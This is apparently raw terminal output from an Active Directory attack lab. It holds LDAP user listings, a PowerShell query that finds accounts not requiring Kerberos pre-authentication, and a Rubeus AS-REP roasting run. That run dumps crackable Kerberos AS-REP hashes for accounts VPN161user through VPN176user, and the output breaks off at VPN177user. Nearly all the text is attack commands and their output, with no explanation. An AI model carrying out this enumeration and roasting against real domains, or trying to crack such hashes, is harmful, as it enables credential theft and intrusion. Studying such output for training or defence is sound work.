instancetype : 4
usncreated : 201518
objectguid : 6fe94140-0e17-4930-b19b-dcd66ca01be0
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:06 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:06 AM, 1/1/1601 12:00:00 AM}
givenname : VPN179
usnchanged : 1481332
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN179User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13679
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:06 AM
name : VPN179User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN180User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN180User
lastlogontimestamp : 7/3/2024 3:44:55 AM
userprincipalname : VPN180user
samaccountname : VPN180user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:55 AM
instancetype : 4
usncreated : 201525
objectguid : 0c84d267-0b29-4334-9b30-6ed05e2cf02f
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:06 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:06 AM, 1/1/1601 12:00:00 AM}
givenname : VPN180
usnchanged : 1481333
lastlogon : 7/3/2024 3:44:55 AM
badpwdcount : 0
cn : VPN180User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13680
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:06 AM
name : VPN180User

Using AD Module
PS C:\Windows\system32> Get-ADUser -Filter { DoesnotRequirePreAuth -eq $True } -Properties
DoesnotRequirePreAuth

DistinguishedName : CN=VPN161User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN161
Name : VPN161User
ObjectClass : user
ObjectGUID : 1d7faaf7-233f-483d-8e17-bcc34c86d6c6
SamAccountName : VPN161user
SID : S-1-5-21-719815819-3726368948-3917688648-13661
Surname : user
UserPrincipalName : VPN161user

DistinguishedName : CN=VPN162User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN162
Name : VPN162User
ObjectClass : user
ObjectGUID : a0229c64-9da4-43d9-88be-eb00bd946fc8
SamAccountName : VPN162user
SID : S-1-5-21-719815819-3726368948-3917688648-13662
Surname : user
UserPrincipalName : VPN162user

DistinguishedName : CN=VPN163User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN163
Name : VPN163User
ObjectClass : user
ObjectGUID : 236ab7bf-a8bd-4e99-8ffa-12bdf7e2f61b
SamAccountName : VPN163user
SID : S-1-5-21-719815819-3726368948-3917688648-13663
Surname : user
UserPrincipalName : VPN163user

DistinguishedName : CN=VPN164User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN164
Name : VPN164User
ObjectClass : user
ObjectGUID : 11210222-24cf-4b41-837d-25f53751852b
SamAccountName : VPN164user
SID : S-1-5-21-719815819-3726368948-3917688648-13664
Surname : user
UserPrincipalName : VPN164user

DistinguishedName : CN=VPN165User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN165
Name : VPN165User
ObjectClass : user
ObjectGUID : 19f3740a-7d2f-45cd-96f1-db8890792d2c
SamAccountName : VPN165user
SID : S-1-5-21-719815819-3726368948-3917688648-13665
Surname : user
UserPrincipalName : VPN165user
DistinguishedName : CN=VPN166User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN166
Name : VPN166User
ObjectClass : user
ObjectGUID : 5fc085fc-3daa-496b-aea4-0a922a098090
SamAccountName : VPN166user
SID : S-1-5-21-719815819-3726368948-3917688648-13666
Surname : user
UserPrincipalName : VPN166user

DistinguishedName : CN=VPN167User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN167
Name : VPN167User
ObjectClass : user
ObjectGUID : 684ed5a2-237d-40de-a794-028b67a37c00
SamAccountName : VPN167user
SID : S-1-5-21-719815819-3726368948-3917688648-13667
Surname : user
UserPrincipalName : VPN167user

DistinguishedName : CN=VPN168User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN168
Name : VPN168User
ObjectClass : user
ObjectGUID : 3fa6a688-e880-4324-b6b6-c6a9bd57b2a0
SamAccountName : VPN168user
SID : S-1-5-21-719815819-3726368948-3917688648-13668
Surname : user
UserPrincipalName : VPN168user

DistinguishedName : CN=VPN169User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN169
Name : VPN169User
ObjectClass : user
ObjectGUID : 6ee585d2-017a-4254-a8c8-9480529f4330
SamAccountName : VPN169user
SID : S-1-5-21-719815819-3726368948-3917688648-13669
Surname : user
UserPrincipalName : VPN169user

DistinguishedName : CN=VPN170User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN170
Name : VPN170User
ObjectClass : user
ObjectGUID : 0ca9fa48-b3b9-4c83-9ddc-95470629fd25
SamAccountName : VPN170user
SID : S-1-5-21-719815819-3726368948-3917688648-13670
Surname : user
UserPrincipalName : VPN170user
DistinguishedName : CN=VPN171User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN171
Name : VPN171User
ObjectClass : user
ObjectGUID : 767b9d56-90f9-450a-b0e1-68bee9485c80
SamAccountName : VPN171user
SID : S-1-5-21-719815819-3726368948-3917688648-13671
Surname : user
UserPrincipalName : VPN171user

DistinguishedName : CN=VPN172User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN172
Name : VPN172User
ObjectClass : user
ObjectGUID : 4959eb44-0821-4d01-8de5-78f7656ab3fd
SamAccountName : VPN172user
SID : S-1-5-21-719815819-3726368948-3917688648-13672
Surname : user
UserPrincipalName : VPN172user

DistinguishedName : CN=VPN173User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN173
Name : VPN173User
ObjectClass : user
ObjectGUID : 185ff3dd-be78-490e-9b23-e18cbda09e64
SamAccountName : VPN173user
SID : S-1-5-21-719815819-3726368948-3917688648-13673
Surname : user
UserPrincipalName : VPN173user

DistinguishedName : CN=VPN174User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN174
Name : VPN174User
ObjectClass : user
ObjectGUID : bd32ff72-94f2-490a-b760-3baf1aef1da1
SamAccountName : VPN174user
SID : S-1-5-21-719815819-3726368948-3917688648-13674
Surname : user
UserPrincipalName : VPN174user

DistinguishedName : CN=VPN175User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN175
Name : VPN175User
ObjectClass : user
ObjectGUID : 4810792d-c9a8-4458-922b-870f2ae3e543
SamAccountName : VPN175user
SID : S-1-5-21-719815819-3726368948-3917688648-13675
Surname : user
UserPrincipalName : VPN175user

DistinguishedName : CN=VPN176User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN176
Name : VPN176User
ObjectClass : user
ObjectGUID : 80ad17e9-8fbf-4a1a-b767-7baa09339a77
SamAccountName : VPN176user
SID : S-1-5-21-719815819-3726368948-3917688648-13676
Surname : user
UserPrincipalName : VPN176user

DistinguishedName : CN=VPN177User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN177
Name : VPN177User
ObjectClass : user
ObjectGUID : a37555a4-68cf-4910-8279-04f0595b857d
SamAccountName : VPN177user
SID : S-1-5-21-719815819-3726368948-3917688648-13677
Surname : user
UserPrincipalName : VPN177user

DistinguishedName : CN=VPN178User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN178
Name : VPN178User
ObjectClass : user
ObjectGUID : dd7c24f4-5da7-4df0-9d8a-08719ae7c049
SamAccountName : VPN178user
SID : S-1-5-21-719815819-3726368948-3917688648-13678
Surname : user
UserPrincipalName : VPN178user

DistinguishedName : CN=VPN179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN179
Name : VPN179User
ObjectClass : user
ObjectGUID : 6fe94140-0e17-4930-b19b-dcd66ca01be0
SamAccountName : VPN179user
SID : S-1-5-21-719815819-3726368948-3917688648-13679
Surname : user
UserPrincipalName : VPN179user

DistinguishedName : CN=VPN180User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN180
Name : VPN180User
ObjectClass : user
ObjectGUID : 0c84d267-0b29-4334-9b30-6ed05e2cf02f
SamAccountName : VPN180user
SID : S-1-5-21-719815819-3726368948-3917688648-13680
Surname : user
UserPrincipalName : VPN180user

Using Rubeus
C:\Windows\system32>C:\AD\Tools\Rubeus.exe asreproast

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: AS-REP roasting

[*] Target Domain : dollarcorp.moneycorp.local

[*] Searching path 'LDAP://dcorp-

dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
[*] SamAccountName : VPN161user
[*] DistinguishedName : CN=VPN161User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN161user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:2AF3B8BCA0C9C56A893AF64E84E4FE5
A$59235D67FA700D66223211FA7FBF2A74933C448751C9B93E727522EBFF37778BE0B2F169DBD463
92E61AB01B0F7066FE83E0CCB32E7C314412D311A8B54B64397D68BE1499A566D8A0A420F8F2557D
E857F42393DBA148A421547847A378695234474E85CFB28FCDCC5709BA2FB3A7D40848E54E75F43C
2A017FC070760A695B23FD545184132BC379A2116014678A1BDFB418A4CAEE3D231A200242ACF3F3
BFD4058FE3F52171A20CA7D5C6F903D43DDD6E06849F9BA0586892CA55797B52CEA1BE15C9A7788B
C32AE26D1CC7ACB0465D37470552E0DABCDD37945701753F033B26EF395197574C5A5B7754016B40
4B1810E9E0D056F0DF28976ADC618A9950EFD79D165CF6E788

[*] SamAccountName : VPN162user

[*] DistinguishedName : CN=VPN162User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN162user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:72C74EDEC1C0A7B5CEFFAC3CEA08FD5
2$E1F50CF32FA22D20C4E9D0DA4015426C52222C36DC234402A63F7A271E9A46512622A4F6D6F5E7
0B2357800070158B97E45C76B613A3015A44C7B5E4BFC7F368F06597DFC713B460F8934AB1525F27
438AF31AAC607CE2A40E9930AC7CE83D5446D3EAE6FC8870E5C10BD6609B47C5E29CE7F116826BDD
3B1A4EB7F40C9E76F6C10CB8748AC8471D8B46BFE4ABA219E7D351B872413DF865EAEEF11EFE4C99
4A19401A6242B1EBC0304E1D7D7E5D7474BC63EA0BB79868182A5546859E89332AB3602B533B496D
D1C5737F8FD2D3ED84E0B11C63E8244A75749003AEB15AB10DB3DA2289A4F4C8E7EC2E29400F0490
82675E732CB37D7123BCC274E72A239A5159496EA45E41BB65

[*] SamAccountName : VPN163user

[*] DistinguishedName : CN=VPN163User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN163user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:209E3B10BAD756C81B28AE13D2B9D0A
C$452A4411F1A7EE0BD3EF015413B99AFB954E71102A7E8E23D98725B4B94F46204A52EF8E6B453C
227AE3D9845C70A60FB84BF8D1823258303B785DC5B9C304BB6420E14789CA1607455D9DA1C67682
548AB2B922A4FC9934CF941089130FB56DEDAAD9C2459D34B4B33BD97CE45871DDD26BE4CFE1A8C4
2D9211BE3BEE50C880F373C1FEAE5BEED4DCEAFBCF614B724FF46DDBACDE7B0D2627C5D592B93474
576AC08137AC57EB76F54B63A85F8EEF8B8DEC7AC120481AF98DC704C9A5EC5EA898219B3B0A3302
BAEAD1569ED4D1F70159340434D2B5FA9EB091A720ACD3CFFDF66B532DAE33F14EA5666FE3202927
3D5EFCB0DBC89CED819F70E27C65115944FA71E7A49BB045AD

[*] SamAccountName : VPN164user

[*] DistinguishedName : CN=VPN164User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN164user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:9C54EB0C2C1FCDE05C9FDEE942805F3
0$A3EF4B34EE941E6D278F1AA02005542A1A532743F9D8B8D89672A2E77AAFE68950C8D5D07386BF
671F14B747D1E2F2894A61E4CD70935CC368F5AF2090180B5540D5D5358FAE757F9FB7C210B051EA
EF6F7E78D9DF0FF49871067CB98A7DABD8D4C3B5B542F49FBF3927E2BEAD7152F997791D2EA8586B
F08B3ECFF4435EBB9B6C98F2AC66B846ADAE3FA4040946EFDBB20659666F1CA2533C0C8E1D15B610
5DAF337E22F3B22A21C25F63D7B1320A3FFC75D200A64DC95CB485141180346BC6E99DFEF106D46C
7E622603E97CD4BF7EF442E2504D61B84168559A528DCA2E860450F87173E25BE450F57BA34E353E
7EE905B26D39F24063B576F02B7F354CD01E3E9DFDD3BC347E

[*] SamAccountName : VPN165user

[*] DistinguishedName : CN=VPN165User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN165user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:64818A374AD93EFC6F810B96A1793C0
6$015D801140A8B31E9C6572C5C5FEDFABCEFFD7F2769A9E96E11DC7180124B3B3ECD5CAF8E342E3
E79E37287091F13C020775D476DD638482DB3D98E46B9B95F1C83EC9A69742D262B7EBA45306FF67
5DEBB4D89B23BE1637C70C8611DAD2724B3C6EFFA09B8233AFCF6BFD129AC1D1ECAC3EA81B34E76D
3382814545C6D961BBD4354B148F341BE3B64702BEB6D05508C8C4749FB11A906BA996FB466743F6
617C206B4B7FC8E79E9E4C55172630FC1DD2B8EEE9C07805E8E170A2DA632F4330BFB168377E4100
F02E530212237DAFB8D0F981B23F89CFD1B051A20A9CDE081879DBB8146E624E5094F09D00BD4399
2BA4ADA732B2190F3A810FCD6CC2A4CFACBE6E360385187F0A

[*] SamAccountName : VPN166user

[*] DistinguishedName : CN=VPN166User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN166user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:D16B1099D006FDB9493692487B2BADA
A$96466294ADEFC50E26457813E229DCFA6FF47E3E13141B0C61AB4D2FD73A3AB567D3C9AD0AC8BE
8A94AC35B92E496DF5BA472861D6F13BE2B93E51150F3E61994CBEFE465E1D63431B4CB5EEFCB25B
32465A7DB5FE9D6E14E49C9D3F6D9CAD0D3EC238E507C5282557586307A6B146675D7952DD37AD51
4417709B5B4ED061DD3530CBB2C287E34A72FEF02760BCBF79D28CC59EFEDE578478E7D94222AD60
0D23EAEA0CDC16E68E624BACF9D0348B84EA721D0DA99264842674F8A2937D6F1AE2671DD22B862B
D0C271ED4FED2D90AA7074A58451B45DB5AE840C984EE0C203BCB53D6A203BDFA6001E63DC808BD4
 5770472011F8825328FEAA7C1059A378DC50AB4A141717EF9D

[*] SamAccountName : VPN167user

[*] DistinguishedName : CN=VPN167User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN167user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:A0468E38EA0126EB95978D821DCE0B0
3$00DD1396BA9D8C98E9434CB463DD7D7BF2B051683688B79AF80863346B73093DAE6C8DAD4CA3EA
93BDBC0D01E5FC53685B0DAC7C793C5B812BF6C318834CE4FB6902546A2563CB9D518D8071580C5E
A5557DA7D298ABF96DFB52727E1A6EBA0319D3E11044BE4BA650C01333CFFB8F496ABC3D68176F2A
DBA28CAEB3078A05D47B2F94C8DDA34D13455240071258CC5B336644BE17C4CC43E5048BA1983141
B2F89AC18799ED97FBBA2865B5F56F90D0BDFDB6F708DBB3651A94C1EE3718497FEFCC07E4970507
40568BBC73662A74DD372CD540B77E9A9B4BEA21C614C9593407F6CBE167DE2A416EAC2903D4D847
416F676C7F327F8C6E1F8EBDC8558AD9B2C7B8EB90660E49E6

[*] SamAccountName : VPN168user

[*] DistinguishedName : CN=VPN168User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN168user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:84C0E9CD6212F77B409325C39FCA397
7$D0CEA3ED0F6DD84B053366AAF4731D2C0EB63B0FDCB0FD7E812B91858ADF430C0BE5E4036D361B
D4203522A70A70610D0C70EDE95896E9B693FE1459C3EE91F8B9080046108333A3B333B19E87E1B7
0A509D7FFA0E747DAB4001A6B302DF3CD3F656BC6A9603D4976099FBA84B997B311ABA68E0017BBE
809DCBC1AE454ADBEEE7BAD19911899B54280CF695BC50680F55F786D38B36B28C6EFB52B7844249
DE45DCFE6175D62605BFDF99033E54E58F354EE710024F8BFA4F7BACCA62A0866192907584F7EEE5
77E461F7356013D76F811733ADB1450ED9A2179C60BA3BCB6CA068E1E27B96A982E5A2EF766F5CC5
B944DDD464C52D4710AF2C054ED76FB3E83A68271DD8C09E6B

[*] SamAccountName : VPN169user

[*] DistinguishedName : CN=VPN169User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN169user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:C915976A8F1A0646996CE874E0E89CD
5$6C6DE01A2A23510BD11AE0BE10625987292BDFB61F69DF9283316FD7ED80A500ACECE522D672FC
3FDB2E94AED52DCF1C1E16A1DBA920169FE3FF0BE9EB2664D87FCB086BBADA730054D336217FDBC1
BD4E29D3C7E54E83671B599DB5749D018B3A4FDA887BB318F8E66231E671EA4EECEB5F0ACF54C375
AC22E7EEA347CD0194625F319AB3EE3A5230AF1B32F65B1C2544F58E7672B4F6E63C66913CE89778
8BF57BFB7531FC1F6C39A5DC86E80D9883D44AC561609A6D48CFD0297A1EAFF3A25FA16336B6FAC0
D4508F5B1A0125E00D9CE260DBD85E9F79226C9FDCDF68A18DB11F3FF2FAD23DEBF8A77851CD93EF
2E3A26E5C56B1ABCB39EC2348A939FE39D3D1E3906041ACA90

[*] SamAccountName : VPN170user

[*] DistinguishedName : CN=VPN170User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN170user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:ED6B7969275D99D6429691D6F17EBE8
6$5CEBC03FC1E81B56E4E8DA8391FC4DD30B2BAB2AB17C347C44E1DC0DE41011B610A34C3CF230E1
 21FFEB6B56325BCF2546312FEDC677DC258E572934C6F2750ECCA9DACD0736AE465A722C2A63B159
4942C99786E2D9E6C2AFC4C74875169F6CE42F3D67BA38166EDBE6B899A2000DEB8E2F65761D977B
D0A5226D12F57CB3E81DA4F475247F9AED46498E6A5B54C3FFDB4992CAB70CB512CB062F3CCC17EA
106FCC9F72F6E99D8539BB6E1216C385948C0297AD83AAC3D4B2E11E655E7DBA72DBC9EBC8E8D30E
209292A3EAE4C072A91FE376A2D6B893CEFCA14843C9FB6E937EC28A3BC875F02E85E1F49CE2E1CD
ED1FB26428512EBA99D83D20C6D473BC9F86D72D19128A1084

[*] SamAccountName : VPN171user

[*] DistinguishedName : CN=VPN171User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN171user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:8E4805A903BFCA8C4FD9DEAB4C9DE94
5$0565FA0243DEE18C18B02DF7B3400232CF163EA8FC8BC79DA0BB4869488964A16A6CD51577115E
EE33CD780953B96395A33D1278802180EFA9A22619883ADB34B523417ACE2FFE9344C0F094425EA2
7FE38C41A0EFAF920739550DC1FF4CD288342C27BC0E2F1F93E7B2504C94BA45B295532843904521
E56385ECA232CF3C63568F392DA90AA797EC3EC05EF6471F54A1DC51E45DBE4297C5AEE2EAF90333
2500CD42B33FF263AF3306F9439DAD423D45D8276778263E3BCE8A7890DFEBB86DCCED4E5556A4E4
5750973D6914253A0A9D438926FA00830D11E5C59F3ABFEDA0CA3BA417B8586E724FE8ADB0F19A8A
1F1DFD2B0E62A50A41AB7D5330FB0257F826D6AF38C57DE616

[*] SamAccountName : VPN172user

[*] DistinguishedName : CN=VPN172User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN172user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:94B5B27A2F3648D3CA03ADB76E57937
D$D7C7F643AE16A3F5747A51BEB1C1DBCF4AE4B12B43B91E9A2969A2F61A7D0405666E97AD7D6E41
6861CFCDB8AD6610D286D8667B79EA6F175F240A74BC58BE6BF184916423AEDBC4D75883455263B3
8DD6619A70EEAD57B86EEB9D09C1188DD7818813E91BC32D368A3B08B08C6F4848837BDE9C81A008
F13F6F98DD818577059E5297F64407190B66BC48554B07E51CC71C81BE4408C529343B543D893DE1
7F9F0436FE2A52F3C703A0F98375858A8F761073E238FBDAEB0548B203CD65763B7A6BF87493D953
9877F4AD0E0AD731E979864051E2BF3BF8ABC64667AC8E834DCA529D7BDEBD480F14C355DAE545CC
4CC5B20F2F903E44E0AE6480695658403F8290A9BCE6E0DA35

[*] SamAccountName : VPN173user

[*] DistinguishedName : CN=VPN173User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN173user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:529BC18360C32B5422D21DFFD39F4FE
F$D93691D41F0EAE35C981B32F678A9ACB025A5F57897D0976E5E895C715617D84C077EF0562FC57
EAE3FE969DE1E8CA2B1D226245B7F02946CEFB54F106BB2048AB066A663FF52CFDA5DEA0090B188F
BD3D14F1FCF322AE6B1820915A19AD52F2F3173D99B79B92CB29288C3A66DB39D2393F3C1A1D40B7
5E500FD1682D9DC5FBE10954D12537FE6951B9AC6CCC01AEE72BDBCECF62389BBF37E96BAE08BAA8
C0BC0221EE8DA351704E77F76F18B1535CCFCA333BC43D0795CFF943D218202DA557215C19E4A712
87EEDE0FA4B887384352A59182976C02BF5DEAA88C805585CFA7B59B1A3C5B7EFA8C5EE58B7779AD
E3A12981EB59BF018C5AABDEEF22DA6D1B160B63AB11A8CAD4

[*] SamAccountName : VPN174user

[*] DistinguishedName : CN=VPN174User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN174user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:4367CF1C17A240012369423CB23AA89
D$5ED349AF52178A49E95F64B50797988E1B9E95D51A7BA3695F06F4397F329FF4408A614AA2A4A7
61DA97D18EA703C91F0E4774F96018A0E8BCBDB6035D9E49B6938CE7F24D2C3BC29969545B0CB1C7
EEF0E0A84B4DB0F87F9CEA84B82E35E8E50C20E25656BBEE3D0F96D01063DC7F48E8B2E6CFF43300
3A52E4A7C3F6C3A63618A3B367FC5EA673330EF810AE114DF092F849B4A911AE563A7C8813ECA927
75C91B12DA6CF642A7285F0CB4A80B06E851B0758D5D971AA9305E7F032A1831D0508EBD2521D526
F6FA00FEE19034E668FF129DA2E5EB0CEF4AFD70257A48B0A1EFB81C9A8E695B37BBD42B51991226
4C55087E427947D4936EA1D2D9227122D68D027F04A2299C86

[*] SamAccountName : VPN175user

[*] DistinguishedName : CN=VPN175User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN175user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:6A000E2F4549675BBFA42DD69FFAB7E
A$412A3DAAB6DC434FBB781F672434A1CD73E95C1FDA2F37206BD26B8B5941067A2B450140F187C0
876E0D229DAB59952BC62F114D04DDF94013E1988B1FA2B6BF1080C0013C1D0DFF7F57A6F3DD5D33
21CF170EB4335CAF2EBFFFD11FBEFFA2D490BF2A7A5CDAE9BE695E4754473B219091084AB55F49DF
B9CD03904A05B948526D2E37B7C301C466538E2891366AC3E5EE1943AAFAA288D9A69EF747CD36BE
C6CAAE11FEA80F7DDBE89BD154F352B9E204CD0ECF9FAF89E0FE0FD45A89E709F411E23D482C315C
2BB29C197A275D4A4AF2750B4186C205EBE62952DCE41B91A3D7B8CC88591A30C4927EB4AF954592
B591C9A9C1ABB1CE14FAE26C98E4F66DA703213734B8BC74E6

[*] SamAccountName : VPN176user

[*] DistinguishedName : CN=VPN176User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN176user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:91A097E8A82EBBCCFDF02AA444DB6B9
D$E4C462BCF92DDE966ED965F59D2EC54B5B44D2F79274DB4A718ADF9EC270C39007AF0FB23424A0
4F0735A3EAA7C4B0EA867BADEBCDF179C70BEC94BC6B5D2E26C986A3F13E899428365153B258AD38
6CEA16B8B077F044DE4F38639DD2B988DB7C066C7AA7A35FFA730D31D1843A911024901B9D761009
2EDF673613220C5CA95E44D3C9C87E57B0EA22F65F32F2C175DA301A732766B82FE4236500131765
91ADB162967A68BA3B7627F3E02054AAAEC032385B6419BAE2ED94C50DC839D305147DB78B8644A0
20EB2121C72A3D36F8A03F20A5B4AB29F4356DE5ED25DB7643A8BE26EA7DA9E06D3FBDBFAAC3CCCA
A806310116C257C5A1DEDB116D8180EA5F2E1023E280256DBA

[*] SamAccountName : VPN177user

[*] DistinguishedName : CN=VPN177User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN177user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:DD1E7E7A89DF71F40E97586D5E30C98
7$8D50E37799AE1938D66A3DD7758E31D11A97CD48EEB4D7EA1C36324CDC1421EE8C103C84C6084F
B7353FC58C5E49C36A5F620299D5D3BAB7E926CCCAF7C63BC0D911D9D19FFA6878CBA72EE000AD61
